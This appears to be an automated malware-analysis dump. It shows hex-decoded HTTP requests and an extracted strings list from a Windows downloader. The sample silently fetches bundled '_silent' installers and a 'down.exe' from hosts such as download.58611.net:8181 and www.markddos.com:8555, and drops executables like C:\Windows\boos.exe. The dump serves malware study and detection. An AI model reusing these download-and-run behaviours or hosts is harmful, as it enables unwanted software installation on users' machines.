0d0a4361 br.baidu.com..Ca 0x000000b0 (00176) 6368652d 436f6e74 726f6c3a 206e6f2d che-Control: no- 0x000000c0 (00192) 63616368 650d0a0d 0a cache.... 0x00000000 (00000) 47455420 2f646974 75692f7a 756a6961 GET /ditui/zujia 0x00000010 (00016) 6e2f4261 69647573 642e5365 7475702e n/Baidusd.Setup. 0x00000020 (00032) 332e302e 302e3436 30392e79 6f757169 3.0.0.4609.youqi 0x00000030 (00048) 616e5f31 30303031 35313934 352e6578 an_1000151945.ex 0x00000040 (00064) 65204854 54502f31 2e310d0a 55736572 e HTTP/1.1..User 0x00000050 (00080) 2d416765 6e743a20 4d6f7a69 6c6c612f -Agent: Mozilla/ 0x00000060 (00096) 342e3020 28636f6d 70617469 626c653b 4.0 (compatible; 0x00000070 (00112) 204d5349 4520362e 303b2057 696e646f MSIE 6.0; Windo 0x00000080 (00128) 7773204e 5420352e 30290d0a 41636365 ws NT 5.0)..Acce 0x00000090 (00144) 70743a20 2a2f2a0d 0a486f73 743a2064 pt: */*..Host: d 0x000000a0 (00160) 6c73772e 62722e62 61696475 2e636f6d lsw.br.baidu.com 0x000000b0 (00176) 0d0a4361 6368652d 436f6e74 726f6c3a ..Cache-Control: 0x000000c0 (00192) 206e6f2d 63616368 650d0a0d 0a no-cache.... 0x00000000 (00000) 47455420 2f646974 75692f7a 756a6961 GET /ditui/zujia 0x00000010 (00016) 6e2f6264 42726f77 73657253 65747570 n/bdBrowserSetup 0x00000020 (00032) 2d353935 362d6674 6e5f3130 30303135 -5956-ftn_100015 0x00000030 (00048) 31393435 2e657865 20485454 502f312e 1945.exe HTTP/1. 0x00000040 (00064) 310d0a55 7365722d 4167656e 743a204d 1..User-Agent: M 0x00000050 (00080) 6f7a696c 6c612f34 2e302028 636f6d70 ozilla/4.0 (comp 0x00000060 (00096) 61746962 6c653b20 4d534945 20362e30 atible; MSIE 6.0 0x00000070 (00112) 3b205769 6e646f77 73204e54 20352e30 ; Windows NT 5.0 0x00000080 (00128) 290d0a41 63636570 743a202a 2f2a0d0a )..Accept: */*.. 0x00000090 (00144) 486f7374 3a20646c 73772e62 722e6261 Host: dlsw.br.ba 0x000000a0 (00160) 6964752e 636f6d0d 0a436163 68652d43 idu.com..Cache-C 0x000000b0 (00176) 6f6e7472 6f6c3a20 6e6f2d63 61636865 ontrol: no-cache 0x000000c0 (00192) 0d0a0d0a 63616368 650d0a0d 0a ....cache.... 0x00000000 (00000) 47455420 2f646974 75692f7a 756a6961 GET /ditui/zujia 0x00000010 (00016) 6e2f4261 69647550 696e7969 6e536574 n/BaiduPinyinSet 0x00000020 (00032) 75705f32 2e31332e 332e3030 5f73772d up_2.13.3.00_sw- 0x00000030 (00048) 30303030 31353139 34352e65 78652048 0000151945.exe H 0x00000040 (00064) 5454502f 312e310d 0a557365 722d4167 TTP/1.1..User-Ag 0x00000050 (00080) 656e743a 204d6f7a 696c6c61 2f342e30 ent: Mozilla/4.0 0x00000060 (00096) 2028636f 6d706174 69626c65 3b204d53 (compatible; MS 0x00000070 (00112) 49452036 2e303b20 57696e64 6f777320 IE 6.0; Windows 0x00000080 (00128) 4e542035 2e30290d 0a416363 6570743a NT 5.0)..Accept: 0x00000090 (00144) 202a2f2a 0d0a486f 73743a20 646c7377 */*..Host: dlsw 0x000000a0 (00160) 2e62722e 62616964 752e636f 6d0d0a43 .br.baidu.com..C 0x000000b0 (00176) 61636865 2d436f6e 74726f6c 3a206e6f ache-Control: no 0x000000c0 (00192) 2d636163 68650d0a 0d0a0a0d 0a -cache....... 0x00000000 (00000) 47455420 2f717150 43547261 795f7369 GET /qqPCTray_si 0x00000010 (00016) 6c656e74 2f717170 636d6772 5f73696c lent/qqpcmgr_sil 0x00000020 (00032) 656e745f 37383231 33303234 382e6578 ent_782130248.ex 0x00000030 (00048) 65204854 54502f31 2e310d0a 55736572 e HTTP/1.1..User 0x00000040 (00064) 2d416765 6e743a20 4d6f7a69 6c6c612f -Agent: Mozilla/ 0x00000050 (00080) 342e3020 28636f6d 70617469 626c653b 4.0 (compatible; 0x00000060 (00096) 204d5349 4520362e 303b2057 696e646f MSIE 6.0; Windo 0x00000070 (00112) 7773204e 5420352e 30290d0a 41636365 ws NT 5.0)..Acce 0x00000080 (00128) 70743a20 2a2f2a0d 0a486f73 743a2064 pt: */*..Host: d 0x00000090 (00144) 6f776e6c 6f61642e 35383631 312e6e65 ownload.58611.ne 0x000000a0 (00160) 743a3831 38310d0a 43616368 652d436f t:8181..Cache-Co 0x000000b0 (00176) 6e74726f 6c3a206e 6f2d6361 6368650d ntrol: no-cache. 0x000000c0 (00192) 0a0d0a63 68650d0a 0d0a0a0d 0a ...che....... 0x00000000 (00000) 47455420 2f70696e 79696e2f 62647069 GET /pinyin/bdpi 0x00000010 (00016) 6e79696e 5f73696c 656e745f 37383231 nyin_silent_7821 0x00000020 (00032) 33303234 382e6578 65204854 54502f31 30248.exe HTTP/1 0x00000030 (00048) 2e310d0a 55736572 2d416765 6e743a20 .1..User-Agent: 0x00000040 (00064) 4d6f7a69 6c6c612f 342e3020 28636f6d Mozilla/4.0 (com 0x00000050 (00080) 70617469 626c653b 204d5349 4520362e patible; MSIE 6. 0x00000060 (00096) 303b2057 696e646f 7773204e 5420352e 0; Windows NT 5. 0x00000070 (00112) 30290d0a 41636365 70743a20 2a2f2a0d 0)..Accept: */*. 0x00000080 (00128) 0a486f73 743a2064 6f776e6c 6f61642e .Host: download. 0x00000090 (00144) 35383631 312e6e65 743a3831 38310d0a 58611.net:8181.. 0x000000a0 (00160) 43616368 652d436f 6e74726f 6c3a206e Cache-Control: n 0x000000b0 (00176) 6f2d6361 6368650d 0a0d0a61 6368650d o-cache....ache. 0x000000c0 (00192) 0a0d0a63 68650d0a 0d0a0a0d 0a ...che....... 0x00000000 (00000) 47455420 2f707073 2f707073 5f73696c GET /pps/pps_sil 0x00000010 (00016) 656e745f 37383231 33303234 382e6578 ent_782130248.ex 0x00000020 (00032) 65204854 54502f31 2e310d0a 55736572 e HTTP/1.1..User 0x00000030 (00048) 2d416765 6e743a20 4d6f7a69 6c6c612f -Agent: Mozilla/ 0x00000040 (00064) 342e3020 28636f6d 70617469 626c653b 4.0 (compatible; 0x00000050 (00080) 204d5349 4520362e 303b2057 696e646f MSIE 6.0; Windo 0x00000060 (00096) 7773204e 5420352e 30290d0a 41636365 ws NT 5.0)..Acce 0x00000070 (00112) 70743a20 2a2f2a0d 0a486f73 743a2064 pt: */*..Host: d 0x00000080 (00128) 6f776e6c 6f61642e 35383631 312e6e65 ownload.58611.ne 0x00000090 (00144) 743a3831 38310d0a 43616368 652d436f t:8181..Cache-Co 0x000000a0 (00160) 6e74726f 6c3a206e 6f2d6361 6368650d ntrol: no-cache. 0x000000b0 (00176) 0a0d0a61 6368650d 0a0d0a61 6368650d ...ache....ache. 0x000000c0 (00192) 0a0d0a63 68650d0a 0d0a0a0d 0a ...che....... 0x00000000 (00000) 47455420 2f68616f 7a69705f 73696c65 GET /haozip_sile 0x00000010 (00016) 6e742f68 616f7a69 705f7369 6c656e74 nt/haozip_silent 0x00000020 (00032) 5f373832 31333032 34382e65 78652048 _782130248.exe H 0x00000030 (00048) 5454502f 312e310d 0a557365 722d4167 TTP/1.1..User-Ag 0x00000040 (00064) 656e743a 204d6f7a 696c6c61 2f342e30 ent: Mozilla/4.0 0x00000050 (00080) 2028636f 6d706174 69626c65 3b204d53 (compatible; MS 0x00000060 (00096) 49452036 2e303b20 57696e64 6f777320 IE 6.0; Windows 0x00000070 (00112) 4e542035 2e30290d 0a416363 6570743a NT 5.0)..Accept: 0x00000080 (00128) 202a2f2a 0d0a486f 73743a20 646f776e */*..Host: down 0x00000090 (00144) 6c6f6164 2e353836 31312e6e 65743a38 load.58611.net:8 0x000000a0 (00160) 3138310d 0a436163 68652d43 6f6e7472 181..Cache-Contr 0x000000b0 (00176) 6f6c3a20 6e6f2d63 61636865 0d0a0d0a ol: no-cache.... 0x000000c0 (00192) 0a0d0a63 68650d0a 0d0a0a0d 0a ...che....... 0x00000000 (00000) 47455420 2f706963 2f706963 5f73696c GET /pic/pic_sil 0x00000010 (00016) 656e745f 37383231 33303234 382e6578 ent_782130248.ex 0x00000020 (00032) 65204854 54502f31 2e310d0a 55736572 e HTTP/1.1..User 0x00000030 (00048) 2d416765 6e743a20 4d6f7a69 6c6c612f -Agent: Mozilla/ 0x00000040 (00064) 342e3020 28636f6d 70617469 626c653b 4.0 (compatible; 0x00000050 (00080) 204d5349 4520362e 303b2057 696e646f MSIE 6.0; Windo 0x00000060 (00096) 7773204e 5420352e 30290d0a 41636365 ws NT 5.0)..Acce 0x00000070 (00112) 70743a20 2a2f2a0d 0a486f73 743a2064 pt: */*..Host: d 0x00000080 (00128) 6f776e6c 6f61642e 35383631 312e6e65 ownload.58611.ne 0x00000090 (00144) 743a3831 38310d0a 43616368 652d436f t:8181..Cache-Co 0x000000a0 (00160) 6e74726f 6c3a206e 6f2d6361 6368650d ntrol: no-cache. 0x000000b0 (00176) 0a0d0a20 6e6f2d63 61636865 0d0a0d0a ... no-cache.... 0x000000c0 (00192) 0a0d0a63 68650d0a 0d0a0a0d 0a ...che....... 0x00000000 (00000) 47455420 2f6b7577 6f5f7369 6c656e74 GET /kuwo_silent 0x00000010 (00016) 2f6b7577 6f5f7369 6c656e74 5f373832 /kuwo_silent_782 0x00000020 (00032) 31333032 34382e65 78652048 5454502f 130248.exe HTTP/ 0x00000030 (00048) 312e310d 0a557365 722d4167 656e743a 1.1..User-Agent: 0x00000040 (00064) 204d6f7a 696c6c61 2f342e30 2028636f Mozilla/4.0 (co 0x00000050 (00080) 6d706174 69626c65 3b204d53 49452036 mpatible; MSIE 6 0x00000060 (00096) 2e303b20 57696e64 6f777320 4e542035 .0; Windows NT 5 0x00000070 (00112) 2e30290d 0a416363 6570743a 202a2f2a .0)..Accept: */* 0x00000080 (00128) 0d0a486f 73743a20 646f776e 6c6f6164 ..Host: download 0x00000090 (00144) 2e353836 31312e6e 65743a38 3138310d .58611.net:8181. 0x000000a0 (00160) 0a436163 68652d43 6f6e7472 6f6c3a20 .Cache-Control: 0x000000b0 (00176) 6e6f2d63 61636865 0d0a0d0a 0d0a0d0a no-cache........ 0x000000c0 (00192) 0a0d0a63 68650d0a 0d0a0a0d 0a ...che....... 0x00000000 (00000) 47455420 2f707074 765f7369 6c656e74 GET /pptv_silent 0x00000010 (00016) 2f505054 565f666f 72716433 3033365f /PPTV_forqd3036_ 0x00000020 (00032) 30323133 342e6578 65204854 54502f31 02134.exe HTTP/1 0x00000030 (00048) 2e310d0a 55736572 2d416765 6e743a20 .1..User-Agent: 0x00000040 (00064) 4d6f7a69 6c6c612f 342e3020 28636f6d Mozilla/4.0 (com 0x00000050 (00080) 70617469 626c653b 204d5349 4520362e patible; MSIE 6. 0x00000060 (00096) 303b2057 696e646f 7773204e 5420352e 0; Windows NT 5. 0x00000070 (00112) 30290d0a 41636365 70743a20 2a2f2a0d 0)..Accept: */*. 0x00000080 (00128) 0a486f73 743a2064 6f776e6c 6f61642e .Host: download. 0x00000090 (00144) 35383631 312e6e65 743a3831 38310d0a 58611.net:8181.. 0x000000a0 (00160) 43616368 652d436f 6e74726f 6c3a206e Cache-Control: n 0x000000b0 (00176) 6f2d6361 6368650d 0a0d0a0a 0d0a0d0a o-cache......... 0x000000c0 (00192) 0a0d0a63 68650d0a 0d0a0a0d 0a ...che....... 0x00000000 (00000) 47455420 2f75706c 6f61642f 62647342 GET /upload/bdsB 0x00000010 (00016) 616f6665 6e673525 35422535 42313637 aofeng5%5B%5B167 0x00000020 (00032) 315f3032 31333425 35442535 442e6578 1_02134%5D%5D.ex 0x00000030 (00048) 65204854 54502f31 2e310d0a 55736572 e HTTP/1.1..User 0x00000040 (00064) 2d416765 6e743a20 4d6f7a69 6c6c612f -Agent: Mozilla/ 0x00000050 (00080) 342e3020 28636f6d 70617469 626c653b 4.0 (compatible; 0x00000060 (00096) 204d5349 4520362e 303b2057 696e646f MSIE 6.0; Windo 0x00000070 (00112) 7773204e 5420352e 30290d0a 41636365 ws NT 5.0)..Acce 0x00000080 (00128) 70743a20 2a2f2a0d 0a486f73 743a2075 pt: */*..Host: u 0x00000090 (00144) 2e646c2e 62616f66 656e672e 636f6d0d .dl.baofeng.com. 0x000000a0 (00160) 0a436163 68652d43 6f6e7472 6f6c3a20 .Cache-Control: 0x000000b0 (00176) 6e6f2d63 61636865 0d0a0d0a 0d0a0d0a no-cache........ 0x000000c0 (00192) 0a0d0a63 68650d0a 0d0a0a0d 0a ...che....... 0x00000000 (00000) 47455420 2f66696c 652f6531 35373838 GET /file/e15788 0x00000010 (00016) 65356134 61356263 34636362 64386163 e5a4a5bc4ccbd8ac 0x00000020 (00032) 66636363 63646464 33623f62 6b743d70 fccccddd3b?bkt=p 0x00000030 (00048) 322d7164 2d323934 2678636f 64653d35 2-qd-294&xcode=5 0x00000040 (00064) 37643735 38313631 66363664 65373036 7d758161f66de706 0x00000050 (00080) 63636432 39346331 64663166 30383361 ccd294c1df1f083a 0x00000060 (00096) 64323364 66616339 62663662 32393930 d23dfac9bf6b2990 0x00000070 (00112) 62323937 37373032 64336536 37363426 b2977702d3e6764& 0x00000080 (00128) 6669643d 31383031 33363031 37342d32 fid=1801360174-2 0x00000090 (00144) 35303532 382d3130 30353534 30373839 50528-1005540789 0x000000a0 (00160) 32303534 31267469 6d653d31 34323738 20541&time=14278 0x000000b0 (00176) 36303839 33267369 676e3d46 44544158 60893&sign=FDTAX 0x000000c0 (00192) 45524c42 482d4443 62373430 63636335 ERLBH-DCb740ccc5 0x000000d0 (00208) 35313165 35653866 65646366 66303662 511e5e8fedcff06b 0x000000e0 (00224) 30383132 30332d46 46626170 71326d36 081203-FFbapq2m6 0x000000f0 (00240) 704b7651 67663638 5050446b 49625752 pKvQgf68PPDkIbWR 0x00000100 (00256) 69512533 4426746f 3d6e6263 26666d3d iQ%3D&to=nbc&fm= 0x00000110 (00272) 4e616e2c 422c4d2c 6e792673 74615f64 Nan,B,M,ny&sta_d 0x00000120 (00288) 783d3226 7374615f 63733d31 26737461 x=2&sta_cs=1&sta 0x00000130 (00304) 5f66743d 65786526 7374615f 63743d30 _ft=exe&sta_ct=0 0x00000140 (00320) 266e6577 7665723d 31266e65 77666d3d &newver=1&newfm= 0x00000150 (00336) 3126666c 6f775f76 65723d33 26736c3d 1&flow_ver=3&sl= 0x00000160 (00352) 38303334 37323132 26657870 69726573 80347212&expires 0x00000170 (00368) 3d386826 72743d73 6826723d 34313739 =8h&rt=sh&r=4179 0x00000180 (00384) 39373632 32266d6c 6f676964 3d333834 97622&mlogid=384 0x00000190 (00400) 34313932 36343026 76756b3d 31333734 4192640&vuk=1374 0x000001a0 (00416) 39313731 32267662 6469643d 33353430 91712&vbdid=3540 0x000001b0 (00432) 31303833 37342666 696e3d37 36353425 108374&fin=7654% 0x000001c0 (00448) 45392539 44253939 25453925 42422539 E9%9D%99%E9%BB%9 0x000001d0 (00464) 38254535 25384325 38352e65 78652666 8%E5%8C%85.exe&f 0x000001e0 (00480) 6e3d3736 35342545 39253944 25393925 n=7654%E9%9D%99% 0x000001f0 (00496) 45392542 42253938 25453525 38432538 E9%BB%98%E5%8C%8 0x00000200 (00512) 352e6578 65204854 54502f31 2e310d0a 5.exe HTTP/1.1.. 0x00000210 (00528) 55736572 2d416765 6e743a20 4d6f7a69 User-Agent: Mozi 0x00000220 (00544) 6c6c612f 342e3020 28636f6d 70617469 lla/4.0 (compati 0x00000230 (00560) 626c653b 204d5349 4520362e 303b2057 ble; MSIE 6.0; W 0x00000240 (00576) 696e646f 7773204e 5420352e 30290d0a indows NT 5.0).. 0x00000250 (00592) 41636365 70743a20 2a2f2a0d 0a486f73 Accept: */*..Hos 0x00000260 (00608) 743a206e 622e6361 6368652e 62616964 t: nb.cache.baid 0x00000270 (00624) 75706373 2e636f6d 0d0a4361 6368652d upcs.com..Cache- 0x00000280 (00640) 436f6e74 726f6c3a 206e6f2d 63616368 Control: no-cach 0x00000290 (00656) 650d0a0d 0a e.... 0x00000000 (00000) 47455420 2f646f77 6e2e6578 65204854 GET /down.exe HT 0x00000010 (00016) 54502f31 2e310d0a 55736572 2d416765 TP/1.1..User-Age 0x00000020 (00032) 6e743a20 4d6f7a69 6c6c612f 342e3020 nt: Mozilla/4.0 0x00000030 (00048) 28636f6d 70617469 626c653b 204d5349 (compatible; MSI 0x00000040 (00064) 4520362e 303b2057 696e646f 7773204e E 6.0; Windows N 0x00000050 (00080) 5420352e 30290d0a 41636365 70743a20 T 5.0)..Accept: 0x00000060 (00096) 2a2f2a0d 0a486f73 743a2077 77772e6d */*..Host: www.m 0x00000070 (00112) 61726b64 646f732e 636f6d3a 38353535 arkddos.com:8555 0x00000080 (00128) 0d0a4361 6368652d 436f6e74 726f6c3a ..Cache-Control: 0x00000090 (00144) 206e6f2d 63616368 650d0a0d 0a373839 no-cache....789 0x000000a0 (00160) 32303534 31267469 6d653d31 34323738 20541&time=14278 0x000000b0 (00176) 36303839 33267369 676e3d46 44544158 60893&sign=FDTAX 0x000000c0 (00192) 45524c42 482d4443 62373430 63636335 ERLBH-DCb740ccc5 0x000000d0 (00208) 35313165 35653866 65646366 66303662 511e5e8fedcff06b 0x000000e0 (00224) 30383132 30332d46 46626170 71326d36 081203-FFbapq2m6 0x000000f0 (00240) 704b7651 67663638 5050446b 49625752 pKvQgf68PPDkIbWR 0x00000100 (00256) 69512533 4426746f 3d6e6263 26666d3d iQ%3D&to=nbc&fm= 0x00000110 (00272) 4e616e2c 422c4d2c 6e792673 74615f64 Nan,B,M,ny&sta_d 0x00000120 (00288) 783d3226 7374615f 63733d31 26737461 x=2&sta_cs=1&sta 0x00000130 (00304) 5f66743d 65786526 7374615f 63743d30 _ft=exe&sta_ct=0 0x00000140 (00320) 266e6577 7665723d 31266e65 77666d3d &newver=1&newfm= 0x00000150 (00336) 3126666c 6f775f76 65723d33 26736c3d 1&flow_ver=3&sl= 0x00000160 (00352) 38303334 37323132 26657870 69726573 80347212&expires 0x00000170 (00368) 3d386826 72743d73 6826723d 34313739 =8h&rt=sh&r=4179 0x00000180 (00384) 39373632 32266d6c 6f676964 3d333834 97622&mlogid=384 0x00000190 (00400) 34313932 36343026 76756b3d 31333734 4192640&vuk=1374 0x000001a0 (00416) 39313731 32267662 6469643d 33353430 91712&vbdid=3540 0x000001b0 (00432) 31303833 37342666 696e3d37 36353425 108374&fin=7654% 0x000001c0 (00448) 45392539 44253939 25453925 42422539 E9%9D%99%E9%BB%9 0x000001d0 (00464) 38254535 25384325 38352e65 78652666 8%E5%8C%85.exe&f 0x000001e0 (00480) 6e3d3736 35342545 39253944 25393925 n=7654%E9%9D%99% 0x000001f0 (00496) 45392542 42253938 25453525 38432538 E9%BB%98%E5%8C%8 0x00000200 (00512) 352e6578 65204854 54502f31 2e310d0a 5.exe HTTP/1.1.. 0x00000210 (00528) 55736572 2d416765 6e743a20 4d6f7a69 User-Agent: Mozi 0x00000220 (00544) 6c6c612f 342e3020 28636f6d 70617469 lla/4.0 (compati 0x00000230 (00560) 626c653b 204d5349 4520362e 303b2057 ble; MSIE 6.0; W 0x00000240 (00576) 696e646f 7773204e 5420352e 30290d0a indows NT 5.0).. 0x00000250 (00592) 41636365 70743a20 2a2f2a0d 0a486f73 Accept: */*..Hos 0x00000260 (00608) 743a206e 622e6361 6368652e 62616964 t: nb.cache.baid 0x00000270 (00624) 75706373 2e636f6d 0d0a4361 6368652d upcs.com..Cache- 0x00000280 (00640) 436f6e74 726f6c3a 206e6f2d 63616368 Control: no-cach 0x00000290 (00656) 650d0a0d 0a e....
Strings
.... ................ "# .... ......... 10/.-,+*)('&%$#"! .............. ..... .......... .. ......... - .. x == ... . -% BbmHpAadYySMI \ .-E-0-0.. 00-+ e 00...........?- 0 0 0 ? !/ u ...... (*.*) ##### ####### 080404B0 %1 1.0.0.0 1uM (&C) Comments Ctrl+ Ctrl+D Ctrl+End Ctrl+G Ctrl+Home Ctrl+N Ctrl+PageDown Ctrl+PageUp &D. DEFAULT_ICON DLL (&E) FileDescription FileVersion Fjjj Fjjjj Fjjjjjjjj ((((( H (&H) (http://www.eyuyan.com) (&I) INI jjjj jjjjjj LegalCopyright msctls_progress32 msctls_updown32 MS Shell Dlg (&N) (null) (&O) (&P) PageDown PageUp ProductName ProductVersion Progress1 %s (&S) Shift+Tab Spin1 StringFileInfo (&T) Tab/Enter TEXTINCLUDE Translation VarFileInfo VS_VERSION_INFO xxxx ^,_^][ ^$_^[] (*.*)|*.*|| ! ! ! ! (&07-034/)7 ' 0dk:ghV 0R>\W[ ,1"52.* 1#QNAN 1#SNAN 2 5 5 5 5 5 %+.2d%.2d \$4t|Ht@H |?5^<@ 5 ! ! ! ! 5 5 5 6 6 6 6 6 6 6 6 6 6 6 6 6 6 , , , , , , , , + + + + + / / / ' ' ' ' ' ' ' ' ' ' ( ( ( ( ( ( ( ( ( ( ( ( ( 707ca37322474f6ca841f0e224f4b620 7 7 7 7 7 7 7 7 7 7 7 * * - - - - 8MThdu \$8UVW 9^0u/j ^}%950lH '9A`u"9 9D$$t+ 9L$x~e 9l$xtU9 9nPu 9^T 9o4u'V 9oTtc 9t$0v8 9^xu5j <A|2<Z abcddefghijklmnoopqrrsstuvvwwxyyz; ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ abnormal program termination Accept: */* Accept: */* %a, %d %b %Y %H:%M:%S AdjustWindowRectEx Advapi32.dll ADVAPI32.dll AfxControlBar42s AfxFrameOrView42s AfxMDIFrame42s AfxOldWndProc423 AfxOleControl42s AfxWnd42s Afx:%x:%x Afx:%x:%x:%x:%x:%x AppendMenuA .?AUCThreadData@@ August .?AV_AFX_BASE_MODULE_STATE@@ .?AV_AFX_CHECKLIST_STATE@@ .?AV_AFX_COLOR_STATE@@ .?AV_AFX_CTL3D_STATE@@ .?AV_AFX_CTL3D_THREAD@@ .?AVAFX_MODULE_STATE@@ .?AVAFX_MODULE_THREAD_STATE@@ .?AV_AFX_SOCK_STATE@@ .?AV_AFX_THREAD_STATE@@ .?AV_AFX_WIN_STATE@@ .?AVCArchiveException@@ .?AVCBitmap@@ .?AVCBrush@@ .?AVCButton@@ .?AVCClientDC@@ .?AVCCmdTarget@@ .?AVCCmdUI@@ .?AVCColorDialog@@ .?AVCComboBox@@ .?AVCCommonDialog@@ .?AVCCriticalSection@@ .?AVCDC@@ .?AVCDialog@@ .?AVCDWordArray@@ .?AVCEdit@@ .?AVCException@@ .?AVCFile@@ .?AVCFileDialog@@ .?AVCFileException@@ .?AVCGdiObject@@ .?AVCHandleMap@@ .?AVCImageList@@ .?AVCMapPtrToPtr@@ .?AVCMapStringToPtr@@ .?AVCMemFile@@ .?AVCMemoryException@@ .?AVCMenu@@ .?AVCNoTrackObject@@ .?AVCNotSupportedException@@ .?AVCObject@@ .?AVCPaintDC@@ .?AVCPen@@ .?AVCProgressCtrl@@ .?AVCPtrArray@@ .?AVCPtrList@@ .?AVCResourceException@@ .?AVCRgn@@ .?AVCSessionMapPtrToPtr@@ .?AVCSharedFile@@ .?AVCSimpleException@@ .?AVCStatic@@ .?AVCStringArray@@ .?AVCSyncObject@@ .?AVCTempDC@@ .?AVCTempGdiObject@@ .?AVCTempImageList@@ .?AVCTempMenu@@ .?AVCTempWnd@@ .?AVCTestCmdUI@@ .?AVCToolTipCtrl@@ .?AVCUserException@@ .?AVCWinApp@@ .?AVCWindowDC@@ .?AVCWinThread@@ .?AVCWnd@@ .?AVCWordArray@@ .?AVtype_info@@ <A|@<Z B 02CV bcdfghijklmnpqrstuvwxyz BeginPaint BeginPath BitBlt BKbhTb~XBK!; (*.BMP)|*.BMP|GIF Bogus message code %d BRPj+S C =02CVu C:\2345explorer_k87648162.exe C:\2345haozip_k87648162.exe C:2345haozip_k87648162.exe C:\2345pcsafe_k87648162.exe C:\7654 CallNextHookEx CallWindowProcA CArchiveException C:\BaiduAn.Setup.1117.4.0.0.516_1000151945.exe C:\BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe C:\Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe C:\bdBrowserSetup-5956-ftn_1000151945.exe C:\bdpinyin_silent_782130248.exe C:\bdsBaofeng5%5B%5B1671_02134%5D%5D.exe CBitmap CBrush CButton CClientDC CCmdTarget CColorDialog CColourPicker CComboBox CCriticalSection Cc: %s CDialog C:\dscKAVSETUPS_66_130903.exe CDWordArray CException CFileDialog CFileException CGdiObject C:\haozip_silent_782130248.exe CharUpperA CheckMenuItem ChildWindowFromPointEx ChooseColorA CImageList C:\jifen_2345/2345explorer_k87648162.exe C:\kuwo_silent_782130248.exe ck(WSbpS ClientToScreen C:\lkfish_k87648162_332947.exe CloseClipboard CloseDatabase CloseHandle ClosePrinter CLSIDFromString CMapPtrToPtr CMapStringToPtr CMemFile CMemoryException CNotSupportedException CObject CombineRgn combobox COMCTL32.dll COMCTL32.DLL comdlg32.dll commctrl_DragListMsg commdlg_ColorOK commdlg_FileNameOK commdlg_help commdlg_LBSelChangedNotify commdlg_SetRGBColor commdlg_ShareViolation CompareStringA CompareStringW Content-Transfer-Encoding: base64 Content-type: multipart/mixed; boundary="#BOUNDARY#" Content-type: text/plain; charset=" CopyAcceleratorTableA CopyRect CPaintDC CPalette C:\pic_silent_782130248.exe C:\pps_silent_782130248.exe C:\PPTV_forqd3036_02134.exe CProgressCtrl CPtrArray CPtrList C:\qqpcmgr_silent_782130248.exe CreateAcceleratorTableA CreateBitmap CreateCompatibleBitmap CreateCompatibleDC CreateDCA CreateDialogIndirectParamA CreateDIBitmap CreateEllipticRgn CreateEventA CreateFileA CreateFontIndirectA CreateIconFromResource CreateIconFromResourceEx CreateMenu CreatePalette CreatePen CreatePolygonRgn CreatePopupMenu CreateProcessA CreateRectRgn CreateRectRgnIndirect CreateRoundRectRgn CreateSemaphoreA CreateSolidBrush CreateThread CreateWindowExA CResourceException CSharedFile CStatic CStringArray CSyncObject CTempDC CTempGdiObject CTempImageList CTempMenu CTempWnd CToolTipCtrl Ctrl+A Ctrl+B Ctrl+C Ctrl+D Ctrl+E Ctrl+F Ctrl+F1 Ctrl+F10 Ctrl+F11 Ctrl+F12 Ctrl+F2 Ctrl+F3 Ctrl+F4 Ctrl+F5 Ctrl+F6 Ctrl+F7 Ctrl+F8 Ctrl+F9 Ctrl+G Ctrl+H Ctrl+I Ctrl+J Ctrl+K Ctrl+L Ctrl+M Ctrl+N Ctrl+O Ctrl+P Ctrl+Q Ctrl+R Ctrl+S Ctrl+Shift+F1 Ctrl+Shift+F10 Ctrl+Shift+F11 Ctrl+Shift+F12 Ctrl+Shift+F2 Ctrl+Shift+F3 Ctrl+Shift+F4 Ctrl+Shift+F5 Ctrl+Shift+F6 Ctrl+Shift+F7 Ctrl+Shift+F8 Ctrl+Shift+F9 Ctrl+T Ctrl+U Ctrl+V Ctrl+W Ctrl+X Ctrl+Y Ctrl+Z (*.CUR)|*.CUR| CUserException CWinApp CWindowDC C:\Windows\boos.exe CWinFormUnit CWinThread CWordArray ?? / %d] D$ _^][ D$,_^] D$,;\$| D$(_^] D$(_^][ D$$_^[ d09f2340818511d396f6aaf844c7e325 D$0WPQ D$ |2; D$49D$$} D$89Vdu D$8RPj D$8VPQ D$$~9+ @.data Date: %s D$(CUSWP %d/%d (%d-%d): %d / %d %d / %d] dddd, MMMM dd, yyyy D$dh,;H D$dPQV D$dQUWRP D$dSUVW D$DSWRPQ D$DURP December DEFAULT_ICON #define _AFX_NO_OLE_RESOURCES #define _AFX_NO_PROPERTY_RESOURCES #define _AFX_NO_TRACKER_RESOURCES DefWindowProcA DELETE DeleteCriticalSection DeleteDC DeleteMenu DeleteObject DestroyAcceleratorTable DestroyCursor DestroyIcon DestroyMenu DestroyWindow device devices D$H_^][ D$hQRP D$hRPQ D$hSUV3 D$hUPQ D$HUPQ D$HUSj DispatchMessageA DISPLAY D$(;l$ DllRegisterServer DllUnregisterServer D$LPUj D$LUSWP DocumentPropertiesA DOMAIN error D$,Pj<j D$ PQR D$PQRP D$PRPQ DPtoLP D$(QPW D$(QRP D$$QUP DrawEdge DrawFocusRect DrawFrameControl DrawIconEx DrawTextA D$@RPQj D$ RPUhD D$,RVhP D$,SPh D$(SUV D$$SUV D$TRPW D$TVPW DuplicateHandle D$@UPQ |$D UV D$@WPS D$XPQU D$XQRWP ;D$xt& ech1Y% EHPWVS Ellipse EmptyClipboard EnableMenuItem EnableWindow EndDialog EndDoc #endif #endif //_WIN32 EndPage EndPaint EndPath EnterCriticalSection EnumDisplayMonitors EnumDisplaySettingsA eQpenc EqualRect Escape ExcludeClipRect ExitProcess ExtSelectClipRgn ExtTextOutA F<_^][ F,_^][ F\_^][ F09^4u*j F49^8u&j F7FC1AE45C5C4758AF03EF19F18A395D F89^8u&j F(9V8tQ FD@ul9L$(}f FD uy9D$$}s February F%*.*f F(_+F$^[;E ?fff&ff23 ffffff ffffff` fffffffff fffffffffffhwww fffffffffffo fffffffffo ffffff`ffo fffffffh F$@;F(v F$@@;F(v FileTimeToLocalFileTime FileTimeToSystemTime FillRect FillRgn FindClose FindFirstFileA FindNextFileA FindResourceA F\jLSP - floating point not loaded FlushFileBuffers foffffff FpHt&Ht FreeEnvironmentStringsA FreeEnvironmentStringsW FreeLibrary Friday From: %s [/fS_MR Fxt_;FTu@ GAIsProcessorFeaturePresent g~b1Y% gb2312 =?gb2312?B? Gdi32.dll GDI32.dll GetACP GetActiveWindow GetBkColor GetBkMode GetCapture GetClassInfoA GetClassLongA GetClassNameA GetClientRect GetClipboardData GetClipBox GetClipRgn GetCommandLineA GetConnectString GetCPInfo 